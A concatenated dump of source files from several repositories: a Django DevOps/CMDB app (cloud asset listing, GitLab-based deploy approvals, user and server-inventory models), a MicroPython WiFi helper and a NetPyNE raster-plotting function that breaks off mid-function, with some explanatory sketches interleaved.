{
"source": "joewen85/devops_study",
"score": 2
}
#### File: apps/cmdb/views.py
```python
from django.shortcuts import render
from django.http import HttpResponse
from django.views.generic import TemplateView
from django.contrib.auth.mixins import LoginRequiredMixin
from pure_pagination.mixins import PaginationMixin
from utils.aliyun_api import AliyunApi
from utils.tencentyun_api import TencentYun_api
from devops_study import settings
class CmdbListView(LoginRequiredMixin, PaginationMixin, TemplateView):
login_url = '/login/'
template_name = 'cmdb/cmdb_list.html'
paginate_by = 20
region = "cn-shanghai"
def get_context_data(self, **kwargs):
context = {}
# get ali asset
ali = AliyunApi(settings.AliYun_AK, settings.AliYun_SK, self.region)
context['ali'] = ali.get_describe_instances()
# for i in data_json['Instances']['Instance']:
# context.append(i)
# get tencent asset
tencent = TencentYun_api(settings.TencentYun_AK, settings.TencentYun_SK)
context['tencent'] = tencent.get_describe_instances('ap-guangzhou')
return context
```
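The view above pulls cloud credentials and a region out of `devops_study/settings.py`, which is not included in this dump. A minimal sketch of the assumed settings entries follows; the key names are taken from this file and from `apps/deploy/views.py` below, and every value is a placeholder rather than a real credential.
```python
# devops_study/settings.py (sketch: only the keys referenced by these views)

# Aliyun credentials consumed by utils.aliyun_api.AliyunApi
AliYun_AK = 'aliyun-access-key-id-placeholder'
AliYun_SK = 'aliyun-access-key-secret-placeholder'

# Tencent Cloud credentials consumed by utils.tencentyun_api.TencentYun_api
TencentYun_AK = 'tencent-secret-id-placeholder'
TencentYun_SK = 'tencent-secret-key-placeholder'

# GitLab endpoint and token consumed by utils.gitlab_api.GitLab_ApiV4
GITURL = 'https://gitlab.example.com'
GIILAB_PRIVATE_TOKEN = 'gitlab-private-token-placeholder'
```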
#### File: apps/deploy/views.py
```python
import json
from django.shortcuts import render, redirect, reverse
from django.views.generic import TemplateView, View, ListView, DetailView
from utils.gitlab_api import GitLab_ApiV4
from django.http import HttpResponse, JsonResponse
from django.contrib.auth.mixins import LoginRequiredMixin
from .forms import DeployForm
from .models import DeployModel
from pure_pagination.mixins import PaginationMixin
from django.db.models import Q
from users.models import UserProfile
from devops_study import settings
# Create your views here.
class DeployApplyView(LoginRequiredMixin, TemplateView):
login_url = '/login/'
template_name = 'deploy/deply_apply.html'
def get_context_data(self, **kwargs):
context = super(DeployApplyView, self).get_context_data(**kwargs)
user = self.request.user.username
gl = GitLab_ApiV4(settings.GITURL, settings.GIILAB_PRIVATE_TOKEN)
user_obj = gl.get_users(user)
# context['user_projects'] = gl.get_all_project()
try:
user_projects = user_obj.projects.list()
context['user_projects'] = user_projects
except:
context['user_projects'] = None
return context
def post(self, request):
deployform = DeployForm(request.POST)
if deployform.is_valid():
data = deployform.cleaned_data
data['status'] = 0
data['applicant'] = self.request.user
name = data['name'].split('/')[1]
data['name'] = name
has_apply = DeployModel.objects.filter(name=name, status__lte=2)
if has_apply:
return render(request, 'deploy/deply_apply.html', {'errmsg': '该项目已经申请上线,但是上线还没有完成,上线完成后方可再次申请!'})
try:
DeployModel.objects.create(**data)
return redirect(reverse('deploy:list'))
except:
return render(request, 'deploy/deply_apply.html', {'errmsg': '申请失败,请查看日志'})
else:
return render(request, 'deploy/deply_apply.html', {'forms': deployform, 'errmsg': '填写格式错误'})
class DeployProjectVersionView(LoginRequiredMixin, View):
def get(self, request):
project_id = request.GET.get('project_id').split('/')[0]
project = GitLab_ApiV4(settings.GITURL, settings.GIILAB_PRIVATE_TOKEN)
tags = project.get_project_version(int(project_id))
tags = [[tag.name, tag.message] for tag in tags]
# print(tags)
return HttpResponse(json.dumps(tags),content_type='application/json')
class DeployProjectBranchView(LoginRequiredMixin, View):
def get(self, request):
project_id = request.GET.get('project_id').split('/')[0]
project = GitLab_ApiV4(settings.GITURL, settings.GIILAB_PRIVATE_TOKEN)
branchs = project.get_project_branchs(project_id)
branchs = [[branch.name, branch.commit['message']] for branch in branchs]
# print(branchs)
return HttpResponse(json.dumps(branchs), content_type='application/json')
class DeployApplyList(LoginRequiredMixin, PaginationMixin, ListView):
login_url = '/login/'
model = DeployModel
context_object_name = 'apply_list'
template_name = 'deploy/deployapply_list.html'
paginate_by = 10
keyword = ''
def get_queryset(self):
# queryset = super(DeployApplyList, self).get_queryset()
user_id = self.request.user.id
user_groups = [group.name for group in UserProfile.objects.get(pk=user_id).groups.all()]
if self.request.user.is_superuser or ('op' in user_groups or 'test' in user_groups):
queryset = self.model.objects.filter(status__lt=2)
else:
queryset = self.model.objects.filter(applicant=user_id).filter(status__lt=2)
try:
self.keyword = self.request.GET.get('keyword', '').strip()
queryset = queryset.filter(Q(name__icontains=self.keyword) | Q(version__contains=self.keyword) | Q(version_desc__icontains=self.keyword))
except Exception as e:
print(e)
return queryset
def get_context_data(self, *, object_list=None, **kwargs):
context = super(DeployApplyList, self).get_context_data(**kwargs)
context['keyword'] = self.keyword
return context
def post(self, request, **kwargs):
pk = self.request.POST.get('apply_id')
try:
self.model.objects.filter(pk=pk).delete()
data = {'code': 0, 'result': 'success'}
except Exception as e:
data = {'code': 1, 'errmsg': '取消失败'}
return JsonResponse(data)
class DeployDetailView(LoginRequiredMixin, DetailView):
login_url = '/login/'
model = DeployModel
template_name = 'deploy/deploy_detail.html'
context_object_name = 'deploy'
def get_context_data(self, **kwargs):
context = super(DeployDetailView, self).get_context_data(**kwargs)
user_id = self.request.user.id
user_groups = [group.name for group in UserProfile.objects.get(pk=user_id).groups.all()]
if 'op' in user_groups or 'test' in user_groups:
context['is_reviewer'] = True
else:
context['is_reviewer'] = False
return context
def post(self, request, **kwargs):
pk = self.kwargs.get('pk')
user_id = self.request.user.id
status = self.model.objects.get(pk=pk).status
if status == 0:
self.model.objects.filter(pk=pk).update(status=1, reviewer=user_id)
elif status == 1:
self.model.objects.filter(pk=pk).update(status=2, handle=user_id)
return redirect(reverse('deploy:deploy', kwargs={'pk': pk}))
class DeployHistoryView(LoginRequiredMixin, ListView):
login_url = '/login/'
model = DeployModel
template_name = 'deploy/deploy_history.html'
context_object_name = 'history_list'
keyword = ''
def get_queryset(self):
# queryset = super(DeployHistoryView, self).get_queryset()
user_id = self.request.user.id
self.keyword = self.request.GET.get('keyword', '').strip()
user_group_list = [group.name for group in UserProfile.objects.get(pk=user_id).groups.all()]
# Check whether the user is a superuser or belongs to the 'op' or 'test' group
if self.request.user.is_superuser or ('op' in user_group_list or 'test' in user_group_list):
queryset = self.model.objects.filter(status__gte=2).filter(Q(name__icontains=self.keyword) | Q(version_desc__icontains=self.keyword))
else:
queryset = self.model.objects.filter(status__gte=2).filter(applicant=user_id).filter(Q(name__icontains=self.keyword) | Q(version_desc__icontains=self.keyword))
return queryset
def get_context_data(self, *, object_list=None, **kwargs):
context = super(DeployHistoryView, self).get_context_data(**kwargs)
context['keyword'] = self.keyword
return context
```
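`utils.gitlab_api.GitLab_ApiV4` is not part of this dump. Below is a hedged sketch of what the wrapper might look like on top of the `python-gitlab` package, limited to the three methods the views call (`get_users`, `get_project_version`, `get_project_branchs`); the method names and return shapes are inferred from the call sites, so treat it as an illustration rather than the project's actual implementation.
```python
# utils/gitlab_api.py (hypothetical sketch inferred from the call sites above)
import gitlab   # pip install python-gitlab


class GitLab_ApiV4(object):
    def __init__(self, url, private_token):
        # Authenticated client against the GitLab v4 API
        self.gl = gitlab.Gitlab(url, private_token=private_token)

    def get_users(self, username):
        # The views call user_obj.projects.list(), so return a single user object
        users = self.gl.users.list(username=username)
        return users[0] if users else None

    def get_project_version(self, project_id):
        # Tag objects expose .name and .message, matching the view's list comprehension
        return self.gl.projects.get(int(project_id)).tags.list()

    def get_project_branchs(self, project_id):
        # Branch objects expose .name and .commit['message'], matching the view
        return self.gl.projects.get(int(project_id)).branches.list()
```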
#### File: apps/users/forms.py
```python
import re
from django.core import validators
from django import forms
from django.contrib.auth.models import Group, Permission
from .models import UserProfile
class LoginForm(forms.Form):
username = forms.CharField(required=True, max_length=20)
password = forms.CharField(required=True, min_length=6)
# Form validation for adding a user
class UserProfileForm(forms.ModelForm):
# phone = forms.CharField(max_length=11, messages='请出入正确格式的号码!')
# pwd1 = forms.CharField(max_length=16, min_length=6)
# pwd2 = forms.CharField(max_length=16, min_length=6)
class Meta:
model = UserProfile
fields = ['username', 'name', 'phone']
error_messages = {
'username': {
'unique': '用户名已存在'
}
}
def clean_phone(self):
"""
Validate that the phone number is well-formed using a regular expression.
"""
phone = self.cleaned_data['phone']
phone_regex = r'^1[345678]\d{9}$'
p = re.compile(phone_regex)
if p.match(phone):
return phone
else:
raise forms.ValidationError('手机号码非法', code='invalid')
class UpdateForm(forms.Form):
username = forms.CharField(max_length=20, required=True)
name = forms.CharField(max_length=32, required=True)
phone = forms.CharField(max_length=11, required=True)
email = forms.EmailField()
def clean_phone(self):
phone = self.cleaned_data.get('phone')
phone_regex = r'^1[34578][0-9]{9}$'
p = re.compile(phone_regex)
if p.match(phone):
return phone
else:
raise forms.ValidationError('手机号码非法', code='invalid')
class PasswordForm(forms.Form):
pwd1 = forms.CharField(max_length=16, min_length=6)
pwd2 = forms.CharField(max_length=16, min_length=6)
def clean(self):
cleaned_data = super().clean()
pwd1 = cleaned_data.get('pwd1')
pwd2 = cleaned_data.get('pwd2')
if pwd1 != pwd2:
raise forms.ValidationError("两次输入密码不一致", code='invalid')
return cleaned_data
```
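A short example of exercising the phone validation above from a Django shell; the import path assumes the `apps/` directory is on `sys.path` (as the other imports in this project suggest), and all field values are made up.
```python
# Import path assumes apps/ is on sys.path, as in this project layout.
from users.forms import UpdateForm

form = UpdateForm(data={
    'username': 'alice',
    'name': 'Alice',
    'phone': '13800138000',   # placeholder number matching ^1[34578][0-9]{9}$
    'email': 'alice@example.com',
})
print(form.is_valid())   # True: clean_phone accepts the number
print(form.errors)       # {}

bad = UpdateForm(data={'username': 'bob', 'name': 'Bob',
                       'phone': '12345', 'email': 'bob@example.com'})
print(bad.is_valid())    # False: clean_phone raises a ValidationError
```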
#### File: apps/users/models.py
```python
from django.db import models
from django.contrib.auth.models import AbstractUser, PermissionsMixin
class UserProfile(AbstractUser):
"""
User model; adds name and phone fields on top of AbstractUser
"""
name = models.CharField(max_length=32, verbose_name="姓名")
phone = models.CharField(max_length=11, verbose_name="手机号码")
class Meta:
verbose_name = "用户"
verbose_name_plural = verbose_name
ordering = ['-id']
app_label = 'users'
def __str__(self):
return self.username
```
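Because `UserProfile` subclasses `AbstractUser`, the project also has to point Django at it; this is the standard one-line setting (the settings module name is assumed from the imports above):
```python
# devops_study/settings.py
AUTH_USER_MODEL = 'users.UserProfile'
```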
{
"source": "joewen85/mycmdb",
"score": 2
}
#### File: apps/device/models.py
```python
from django.contrib.auth.models import User
from django.db import models
# Create your models here.
class Cloudips(models.Model):
"""服务器运营商"""
cloudipsname = models.CharField(max_length=10, verbose_name="服务器运营商")
describe = models.CharField(max_length=10, verbose_name="描述")
created_at = models.DateTimeField(auto_now_add=True, verbose_name="创建时间")
updated_at = models.DateTimeField(auto_now=True, verbose_name="修改时间")
class Meta:
verbose_name = "服务器运营商"
verbose_name_plural = verbose_name
def __str__(self):
return self.describe
class Envirment(models.Model):
"""服务器环境"""
envname = models.CharField(max_length=20, verbose_name="服务器运行环境")
describe = models.CharField(max_length=20, verbose_name="描述")
created_at = models.DateTimeField(auto_now_add=True, verbose_name="创建时间")
updated_at = models.DateTimeField(auto_now=True, verbose_name="修改时间")
phpbin = models.CharField(max_length=100, verbose_name="PHP环境路径", null=True)
vhost_path = models.CharField(max_length=100, verbose_name="网站虚拟目录路径", null=True)
fastcgi_pass = models.CharField(max_length=64, verbose_name="后端PHP处理方式", null=True, blank=True)
class Meta:
verbose_name = "运行环境"
verbose_name_plural = verbose_name
def __str__(self):
return self.describe
class Jobs(models.Model):
"""任务"""
jid = models.AutoField(primary_key=True)
name = models.CharField(max_length=50, verbose_name="任务名称")
path = models.CharField(max_length=100, verbose_name="任务路径")
describe = models.CharField(max_length=50, verbose_name="描述")
class Meta:
verbose_name = "任务"
verbose_name_plural = verbose_name
def __str__(self):
return self.name
class Device(models.Model):
"""服务器详情"""
hostname = models.CharField(max_length=50, verbose_name="服务器名称", null=False, unique=True, db_index=True)
ipaddress = models.GenericIPAddressField(verbose_name='服务器IP地址', db_index=True)
sshuser = models.CharField(max_length=20, verbose_name="服务器登陆用户")
sshpassword = models.CharField(max_length=50, verbose_name="服务器登陆密码", null=False)
websitepath = models.CharField(max_length=200, verbose_name="网站存放位置", null=False)
envirment = models.ForeignKey(Envirment, verbose_name="运行环境", on_delete=models.DO_NOTHING)
cloudips = models.ForeignKey(Cloudips, verbose_name="服务器运营商", on_delete=models.DO_NOTHING)
customer_name = models.CharField(max_length=50, verbose_name="客户用户名", null=True)
sshport = models.PositiveSmallIntegerField(verbose_name="服务器登陆端口", default=22)
created_at = models.DateTimeField(auto_now_add=True, verbose_name="创建时间")
updated_at = models.DateTimeField(auto_now=True, verbose_name="修改时间")
# is_monitor = models.BooleanField(verbose_name="是否监控")
is_maintenance = models.BooleanField(verbose_name="是否维护", default=0)
maintenance_duration = models.CharField(max_length=25, verbose_name="维护期限", null=True, blank=True)
deploy_times = models.IntegerField(verbose_name="部署队列和计划任务次数", default=0)
deploy_weiqingshop_times = models.SmallIntegerField(verbose_name="部署框架与商城次数", default=0)
deploy_frameworkshop_times = models.SmallIntegerField(verbose_name="部署微擎与商城次数", default=0)
others = models.TextField(verbose_name="其他内容", null=True, blank=True)
paid = models.BooleanField(verbose_name="商城收费客户", default=0)
ftpuser = models.CharField(max_length=32, default='www', verbose_name="ftp用户名")
ftppassword = models.CharField(max_length=32, verbose_name="ftp密码", null=True)
mysqluser = models.CharField(max_length=32, default='root', verbose_name="mysql用户名")
mysqlpassword = models.CharField(max_length=32, verbose_name="mysql密码", null=True)
mysqladdress = models.CharField(max_length=64, default='127.0.0.1', verbose_name="mysql连接地址")
# Shop version: 0 = standalone edition, 1 = WeEngine (weiqing) edition
shop_version = models.BooleanField(verbose_name="商城版本", default=0)
mongodbuser = models.CharField(max_length=32, verbose_name='mongodb用户名', default='root')
mongodbaddress = models.CharField(max_length=64, verbose_name='mongodb连接地址', default='127.0.0.1')
class Meta:
verbose_name = "用户设备信息"
verbose_name_plural = verbose_name
def __str__(self):
return self.hostname
class Deploy_record(models.Model):
"""部署队列和计划任务记录"""
hostname = models.ForeignKey(Device, related_name='deploy_record', verbose_name="服务器名称", on_delete=models.CASCADE)
# hostname = models.CharField(verbose_name="服务器名称", max_length=32, null=True)
deploy_datetime = models.DateTimeField(auto_now_add=True, verbose_name="部署时间")
desc = models.CharField(max_length=100, verbose_name="描述", null=True)
operator = models.CharField(max_length=20, verbose_name="操作员", null=True)
# operator = models.ForeignKey(User, verbose_name="操作员", on_delete=models.DO_NOTHING, null=True)
remote_ip = models.GenericIPAddressField(verbose_name="远程访问地址", null=True)
# jobname = models.ForeignKey(Jobs, on_delete=models.DO_NOTHING, null=True, verbose_name="任务名称")
jobname = models.CharField(max_length=32, null=True, verbose_name="任务名称")
result = models.TextField(null=True, verbose_name="执行任务结果")
class Meta:
verbose_name = "部署记录"
verbose_name_plural = verbose_name
def __str__(self):
return "结果"
class Password_record(models.Model):
"""独立密码表"""
ipaddress = models.ForeignKey(Device, db_column="server_ip", related_name="PASSWORD", on_delete=models.CASCADE)
sshpassword = models.CharField(max_length=600, verbose_name="服务器登陆密码", null=False)
ftppassword = models.CharField(max_length=600, verbose_name="ftp密码", null=True)
mysqlpassword = models.CharField(max_length=600, verbose_name="mysql密码", null=True)
mongodbpassword = models.CharField(max_length=600, verbose_name="mongodb密码", null=True)
def __str__(self):
return "密码表"
class Meta:
verbose_name = "密码表"
verbose_name_plural = verbose_name
default_permissions = ()
permissions = (
("select_table", "查看密码表"),
("change_table", "修改密码表"),
("decode_password", "解密加密密码")
)
```
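A few example ORM queries against the models above, showing how the foreign keys and `related_name`s wire together; the import path, hostname, and environment name are placeholders.
```python
# Run inside a Django shell for this project (import path assumes apps/ is on sys.path).
from device.models import Device

# Servers in a given environment, with provider info fetched in the same query
devices = (Device.objects
           .select_related('envirment', 'cloudips')
           .filter(envirment__envname='php72-nginx'))   # placeholder environment name

dev = Device.objects.get(hostname='web-01')              # placeholder hostname

# Reverse relations defined by related_name on the models above
records = dev.deploy_record.all()   # Deploy_record rows for this server
passwords = dev.PASSWORD.all()      # Password_record rows (related_name="PASSWORD")
```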
#### File: apps/domain/models.py
```python
from django.db import models
from device.models import Device
# Create your models here.
class DomainDetail(models.Model):
domain = models.CharField(max_length=50, verbose_name="域名", db_index=True, unique=True)
# 1 = blacklisted, 0 = whitelisted
is_blacklist = models.BooleanField(verbose_name="是否黑名单", default=0)
class Meta:
verbose_name = "域名详情"
verbose_name_plural = verbose_name
def __str__(self):
return self.domain
```
#### File: apps/webssh/tools.py
```python
import time
import random
import hashlib
def get_key_obj(pkeyobj, pkey_file=None, pkey_obj=None, password=None):
if pkey_file:
with open(pkey_file) as fp:
try:
pkey = pkeyobj.from_private_key(fp, password=password)
return pkey
except:
pass
else:
try:
pkey = pkeyobj.from_private_key(pkey_obj, password=password)
return pkey
except:
pkey_obj.seek(0)
def unique():
ctime = str(time.time())
salt = str(random.random())
m = hashlib.md5(bytes(salt, encoding='utf-8'))
m.update(bytes(ctime, encoding='utf-8'))
return m.hexdigest()
```
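`get_key_obj` expects a key class exposing `from_private_key` (paramiko's key classes fit), and `unique()` returns a random hex id, e.g. for naming a web terminal session. A usage sketch, assuming paramiko is installed; the key paths are placeholders.
```python
import io
import paramiko
from webssh.tools import get_key_obj, unique   # import path assumes apps/ is on sys.path

# Load a private key from a file on disk (password only needed for encrypted keys)
pkey = get_key_obj(paramiko.RSAKey, pkey_file='/path/to/id_rsa', password=None)

# Or from an in-memory file-like object
with open('/path/to/id_rsa') as f:
    pkey = get_key_obj(paramiko.RSAKey, pkey_obj=io.StringIO(f.read()), password=None)

# Random hex id, e.g. to key a websocket/webssh session
session_id = unique()
```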
{
"source": "joewez/FunWithMicroPython",
"score": 3
}
#### File: FunWithMicroPython/frozen/wifi.py
```python
import network
def connect(ssid, password="", silent=True):
ap = network.WLAN(network.AP_IF)
ap.active(False)
wlan = network.WLAN(network.STA_IF)
wlan.active(True)
if not wlan.isconnected():
if not silent:
print('connecting to network...')
wlan.connect(ssid, password)
while not wlan.isconnected():
pass
if not silent:
print('network config:', wlan.ifconfig())
def disconnect(silent=True):
wlan = network.WLAN(network.STA_IF)
wlan.active(False)
while wlan.isconnected():
pass
if not silent:
print('disconnected.')
def access_point(ssid, passphrase="", silent=True):
wlan = network.WLAN(network.STA_IF)
wlan.active(False)
while wlan.isconnected():
pass
ap = network.WLAN(network.AP_IF)
ap.active(True)
if (passphrase == ''):
ap.config(essid=ssid, password="", authmode=1)
else:
ap.config(essid=ssid, password=passphrase, authmode=4)
if not silent:
print('network config:', ap.ifconfig())
def none(silent=True):
ap = network.WLAN(network.AP_IF)
ap.active(False)
wlan = network.WLAN(network.STA_IF)
wlan.active(False)
while wlan.isconnected():
pass
if not silent:
print('wifi off')
def off():
none()
def scan():
import esp
import time
esp.osdebug(None)
wlan = network.WLAN(network.STA_IF)
state = wlan.active()
wlan.active(True)
time.sleep(2)
print('Scanning...')
nets = wlan.scan()
for net in nets:
print(' ' + str(net[0], "utf-8"))
if not state:
wlan.active(False)
esp.osdebug(0)
def status():
ap = network.WLAN(network.AP_IF)
print('AP :{0}'.format(ap.active()))
if (ap.active()):
(address, mask, gateway, dns) = ap.ifconfig()
print(' IP :{0}'.format(address))
print(' GW :{0}'.format(gateway))
print(' DNS:{0}'.format(dns))
sta = network.WLAN(network.STA_IF)
print('STA:{0}'.format(sta.active()))
if (sta.active()):
(address, mask, gateway, dns) = sta.ifconfig()
print(' IP :{0}'.format(address))
print(' GW :{0}'.format(gateway))
print(' DNS:{0}'.format(dns))
ma = ":".join(map(lambda x: "%02x" % x, sta.config('mac')))
print('MAC:{0}'.format(ma))
def connected():
wlan = network.WLAN(network.STA_IF)
return wlan.isconnected()
def debug(state=True):
import esp
if state:
esp.osdebug(0)
else:
esp.osdebug(None)
def man():
print("""
Commands:
connect(ssid, [password], [silent]) - Connect to an access point*
disconnect([silent]) - Disconnect from the current access point*
access_point(ssid, [passphrase], [silent]) - Create an Access Point*
none([silent]) - Turn all WiFi interfaces off*
off() - Same as none()
scan() - List available access points
status() - Show current WiFi status
connected() - Return status of the STA connection
debug(state) - Turns the debug messages on and off*
* = Setting will PERSIST across a reboot
""")
def help():
man()
def version():
return '1.2.0'
```
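Typical use of this frozen module from the MicroPython REPL, following the `man()` text above; the SSID and passwords are placeholders.
```python
import wifi

wifi.connect('my-ssid', 'my-password', silent=False)   # join an access point (blocks until connected)
print(wifi.connected())                                # True once associated
wifi.status()                                          # dump AP/STA config

wifi.access_point('esp-setup', 'setup-pass')           # or run the board as an access point instead
wifi.off()                                             # turn all WiFi interfaces off
wifi.man()                                             # built-in help text
```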
{
"source": "joewgraham/netpyne",
"score": 3
}
#### File: netpyne/plotting/plotRaster.py
```python
import numpy as np
import matplotlib.patches as mpatches
from ..analysis.utils import exception #, loadData
from ..analysis.tools import loadData
from .plotter import ScatterPlotter
@exception
def plotRaster(
rasterData=None,
popNumCells=None,
popLabels=None,
popColors=None,
axis=None,
legend=True,
colorList=None,
orderInverse=False,
returnPlotter=False,
**kwargs):
"""Function to produce a raster plot of cell spiking, grouped by population
Parameters
----------
rasterData : list, tuple, dict, str
the data necessary to plot the raster (spike times and spike indices, at minimum).
*Default:* ``None`` uses ``analysis.prepareRaster`` to produce ``rasterData`` using the current NetPyNE sim object.
*Options:* if a *list* or a *tuple*, the first item must be a *list* of spike times and the second item must be a *list* the same length of spike indices (the id of the cell corresponding to that spike time). Optionally, a third item may be a *list* of *ints* representing the number of cells in each population (in lieu of ``popNumCells``). Optionally, a fourth item may be a *list* of *strs* representing the population names (in lieu of ``popLabels``).
If a *dict*, it must have keys ``'spkTimes'`` and ``'spkInds'`` and may optionally include ``'popNumCells'`` and ``'popLabels'``.
If a *str*, it must represent a file path to previously saved data.
popNumCells : list
a *list* of *ints* representing the number of cells in each population.
*Default:* ``None`` puts all cells into a single population.
popLabels : list
a *list* of *strs* of population names. Must be the same length as ``popNumCells``.
*Default:* ``None`` uses generic names.
popColors : dict
a *dict* of ``popLabels`` and their desired color.
*Default:* ``None`` draws from the NetPyNE default colorList.
axis : matplotlib axis
the axis to plot into, allowing overlaying of plots.
*Default:* ``None`` produces a new figure and axis.
legend : bool
whether or not to add a legend to the plot.
*Default:* ``True`` adds a legend.
colorList : list
a *list* of colors to draw from when plotting.
*Default:* ``None`` uses the default NetPyNE colorList.
orderInverse : bool
whether or not to invert the y axis (useful if populations are defined top-down).
*Default:* ``False`` does not invert the y-axis.
returnPlotter : bool
whether to return the figure or the NetPyNE Plotter object.
*Default:* ``False`` returns the figure.
Plot Options
------------
title : str
the axis title.
*Default:* ``'Raster Plot of Spiking'``
xlabel : str
label for x-axis.
*Default:* ``'Time (ms)'``
ylabel : str
label for y-axis.
*Default:* ``'Cells'``
s : int
marker size.
*Default:* ``5``
marker : str
marker symbol.
*Default:* ``'|'``
linewidth : int
line width (affects other sizes).
*Default:* ``2``
legendKwargs : dict
a *dict* containing any or all legend kwargs. These include ``'title'``, ``'loc'``, ``'fontsize'``, ``'bbox_to_anchor'``, ``'borderaxespad'``, and ``'handlelength'``.
rcParams : dict
a *dict* containing any or all matplotlib rcParams. To see all options, execute ``import matplotlib; print(matplotlib.rcParams)`` in Python. Any options in this *dict* will be used for this current figure and then returned to their prior settings.
overwrite : bool
whether to overwrite existing figure files.
*Default:* ``True`` overwrites the figure file
*Options:* ``False`` adds a number to the file name to prevent overwriting
NetPyNE Options
---------------
include : str, int, list
cells and/or NetStims to return information from
*Default:* ``'allCells'`` includes all cells and no NetStims
*Options:*
(1) ``'all'`` includes all cells and all NetStims,
(2) ``'allNetStims'`` includes all NetStims but no cells,
(3) a *str* which matches a popLabel includes all cells in that pop,
(4) a *str* which matches a NetStim name includes that NetStim,
(5) an *int* includes the cell with that global identifier (GID),
(6) a *list* of *ints* includes the cells with those GIDS,
(7) a *list* with two items, the first of which is a *str* matching a popLabel and the second of which is an *int* (or a *list* of *ints*), includes the relative cell(s) from that population (e.g. ``['popName', [0, 1]]`` includes the first two cells in popName).
timeRange : list
time range to include in the raster: ``[min, max]``.
*Default:* ``None`` uses the entire simulation
maxSpikes : int
the maximum number of spikes to include (by reducing the max time range).
*Default:* ``1e8``
orderBy : str
how to order the cells along the y-axis.
*Default:* ``'gid'`` orders cells by their index
*Options:* any NetPyNE cell tag, e.g. ``'pop'``, ``'x'``, ``'ynorm'``.
popRates : bool
whether to include the spiking rates in the plot title and legend.
*Default:* ``True`` includes detailed pop information on plot.
*Options:*
``False`` only includes pop names.
``'minimal'`` includes minimal pop information.
saveData : bool
whether to save to a file the data used to create the figure.
*Default:* ``False`` does not save the data to file
fileName : str
if ``saveData`` is ``True``, this is the name of the saved file.
*Default:* ``None`` a file name is automatically generated.
fileDesc : str
an additional *str* to include in the file name just before the file extension.
*Default:* ``None`` includes no extra text in the file name.
fileType : str
the type of file to save the data to.
*Default:* ``json`` saves the file in JSON format.
*Options:* ``pkl`` saves the file in Python Pickle format.
fileDir : str
the directory to save the data to.
*Default:* ``None`` saves to the current directory.
sim : NetPyNE sim object
the *sim object* from which to get data.
*Default:* ``None`` uses the current NetPyNE sim object
Returns
-------
rasterPlot : *matplotlib figure*
By default, returns the *figure*. If ``returnPlotter`` is ``True``, instead returns the NetPyNE *Plotter object* used.
Examples
--------
There are many options available in plotRaster. To run a variety of examples, enter the following::
from netpyne.plotting import plotRaster
from netpyne.plotting.examples import spikeSim
sim = spikeSim()
First, let's just use mostly the default settings, though we will save the figure and the data. If ``rasterData`` is ``None`` (default), NetPyNE uses ``analysis.prepareRaster`` to generate the ``rasterData`` used in the plot::
plot = plotRaster(showFig=True, saveData=True)
Because we will just be looking at data from one example simulation, we don't need to reprocess the data every time. Let's save the output data, and then we can use that to generate more plots::
plot = plotRaster(showFig=True, saveFig=True, overwrite=True, saveData=True)
This will save a data file with the raster data.
"""
# If there is no input data, get the data from the NetPyNE sim object
if rasterData is None:
if 'sim' not in kwargs:
from .. import sim
else:
sim = kwargs['sim']
rasterData = sim.analysis.prepareRaster(legend=legend, popLabels=popLabels, **kwargs)
print('Plotting raster...')
# If input is a file name, load data from the file
if type(rasterData) == str:
rasterData = loadData(rasterData)
# If input is a dictionary, pull the data out of it
if type(rasterData) == dict:
spkTimes = rasterData['spkTimes']
spkInds = rasterData['spkInds']
if not popNumCells:
popNumCells = rasterData.get('popNumCells')
if not popLabels:
popLabels = rasterData.get('popLabels')
axisArgs = rasterData.get('axisArgs')
legendLabels = rasterData.get('legendLabels')
# If input is a list or tuple, the first item is spike times, the second is spike indices
elif type(rasterData) == list or type(rasterData) == tuple:
spkTimes = rasterData[0]
spkInds = rasterData[1]
axisArgs = None
legendLabels = None
# If there is a third item, it should be popNumCells
if not popNumCells:
try: popNumCells = rasterData[2]
except: pass
# If there is a fourth item, it should be popLabels
if not popLabels:
try: popLabels = rasterData[3]
except: pass
# If there is no info about pops, generate info for a single pop
if not popNumCells:
popNumCells = [max(spkInds)]
if popLabels:
popLabels = [str(popLabels[0])]
else:
popLabels = ['population']
# If there is info about pop numbers, but not labels, generate the labels
elif not popLabels:
popLabels = ['pop_' + str(index) for index, pop in enumerate(popNumCells)]
# If there is info about pop numbers and labels, make sure they are the same size
if len(popNumCells) != len(popLabels):
raise Exception('In plotRaster, popNumCells (' + str(len(popNumCells)) + ') and popLabels (' + str(len(popLabels)) + ') must be the same size')
# Create a dictionary with the color for each pop
if not colorList:
from .plotter import colorList
popColorsTemp = {popLabel: colorList[ipop%len(colorList)] for ipop, popLabel in enumerate(popLabels)}
if popColors:
popColorsTemp.update(popColors)
popColors = popColorsTemp
# Create a list to link cells to their populations
indPop = []
for popLabel, popNumCell in zip(popLabels, popNumCells):
indPop.extend(int(popNumCell) * [popLabel])
# Create a dictionary to link cells to their population color
cellGids = list(set(spkInds))
gidColors = {cellGid: popColors[indPop[cellGid]] for cellGid in cellGids}
# Create a list of spkColors to be fed into the scatter plot
spkColors = [gidColors[spkInd] for spkInd in spkInds]
# Set the time range appropriately
if 'timeRange' in kwargs:
timeRange = kwargs['timeRange']
elif 'timeRange' in rasterData:
timeRange = rasterData['timeRange']
else:
timeRange = [0, np.ceil(max(spkTimes))]
# Create a dictionary with the inputs for a scatter plot
scatterData = {}
scatterData['x'] = spkTimes
scatterData['y'] = spkInds
scatterData['c'] = spkColors
scatterData['s'] = 5
scatterData['marker'] = '|'
scatterData['linewidth'] = 2
scatterData['cmap'] = None
scatterData['norm'] = None
scatterData['alpha'] = None
scatterData['linewidths'] = None
# If we use a kwarg, we add it to the list to be removed from kwargs
kwargDels = []
# If a kwarg matches a scatter input key, use the kwarg value instead of the default
for kwarg in kwargs:
if kwarg in scatterData:
scatterData[kwarg] = kwargs[kwarg]
kwargDels.append(kwarg)
# Create a dictionary to hold axis inputs
if not axisArgs:
axisArgs = {}
axisArgs['title'] = 'Raster Plot of Spiking'
axisArgs['xlabel'] = 'Time (ms)'
axisArgs['ylabel'] = 'Cells'
# If a kwarg matches an axis input key, use the kwarg value instead of the default
for kwarg in kwargs:
if kwarg in axisArgs.keys():
axisArgs[kwarg] = kwargs[kwarg]
kwargDels.append(kwarg)
# Delete any kwargs that have been used
for kwargDel in kwargDels:
kwargs.pop(kwargDel)
# create Plotter object
rasterPlotter = ScatterPlotter(data=scatterData, axis=axis, **axisArgs, **kwargs)
rasterPlotter.type = 'raster'
# add legend
if legend:
# Set up a dictionary of population colors
if not popColors:
colorList = colorList
popColors = {popLabel: colorList[ipop % len(colorList)] for ipop, popLabel in enumerate(popLabels)}
# Create the labels and handles for the legend
